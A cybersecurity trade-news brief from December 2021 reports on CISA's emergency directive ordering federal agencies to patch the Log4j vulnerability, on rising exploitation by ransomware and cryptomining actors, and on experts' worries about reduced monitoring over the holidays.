Skip to main content
close search
site logo
Dive Brief

Federal authorities brace for long holiday as Log4j threat activity rises

Published Dec. 20, 2021
David Jones's headshot
Reporter
Kevin Dietsch / Staff via Getty Images

Dive Brief:

  • The Cybersecurity and Infrastructure Security Agency issued an emergency directive due to Log4j, requiring all federal agencies to review and patch internet-facing applications amid growing threat activity. Multiple threat actors were actively exploiting Log4j vulnerabilities, CISA Director Jen Easterly said.  
  • Threat actors may be able to use additional methods to circumvent existing mitigation methods, as researchers from Blumira warned about a potential workaround linked to the Javascript Websocket connection. Apache meanwhile issued an additional update 2.17.0 for Java 8 users, in connection with a denial-of-service vulnerability, CVE-2021-45105.
  • Security researchers and others are concerned about potential risks during the upcoming holiday, as Christmas and New Years fall on consecutive weekends that will provide a huge window when operations teams will have limited visibility into enterprise systems, according to Roger Koehler, VP of threat operations at Huntress.

Dive Insight:

Federal agencies have particular vulnerabilities due to their reliance on legacy technology and have often failed to patch and supply timely security updates to existing systems.

"The CISA emergency directive is important because many agencies at the U.S. government have been slow to patch and a vulnerability like Log4Shell can have lasting effects if not properly addressed quickly," Koehler said. 

Koehler cited an August 2021 report from the Senate Committee on Homeland Security and Government Affairs report which noted that six agencies failed to install patches and take other important measures two years after a 2019 report from the inspector general.

Seven agencies used legacy systems or applications that were no longer being supported with security updates, according to the report from Sens. Rob Portman, R-Ohio, and Gary Peters, D-Mich.

The concerns about Log4Shell are rising amid reports that threat actors are deploying Conti ransomware and installing cryptominers on vulnerable systems, Koehler said. 

Similar to the Microsoft Exchange attacks earlier this year, the threats related to Log4Shell are escalating from the initial set of probes and coin mining, to exfiltration and ransomware, said Saumitra Das, CTO and co-founder of Blue Hexagon. 

"Since ransomware initial access brokers typically already have foothold infections in enterprises, I fully expect them to scan internal hosts for Log4j vulnerabilities and use it to spread and deploy ransomware," Das said. 

Organizations should not limit their search for signs of exploitation to just external locations but also check internally and in cloud environments. Log4j has also been used to steal cloud credentials like AWS keys as well, Das said. 

Filed Under: Vulnerability

Editors' picks

Company Announcements

View all | Post a press release
DigiCert Unveils 2025 Security Predictions
From DigiCert
November 21, 2024
Nile Adds Industry’s First Campus Zero Trust Delivered As a Service
From Nile
November 21, 2024
TrustNet Named 2024’s Best Compliance Advisory and Audit Firm at CDM’s Annual Top InfoSec Inno…
From TrustNet
November 06, 2024
Fathom5’s ARIA Technology Joins NSIN Propel Maritime Digital Defense Accelerator
From Fathom5
November 18, 2024
Editors' picks
Latest in Vulnerability
image/svg+xml
Industry Dive is an Informa business
© 2024 Industry Dive. All rights reserved. | View our other publications | Privacy policy | Terms of use | Take down policy.
Cookie Preferences / Do Not Sell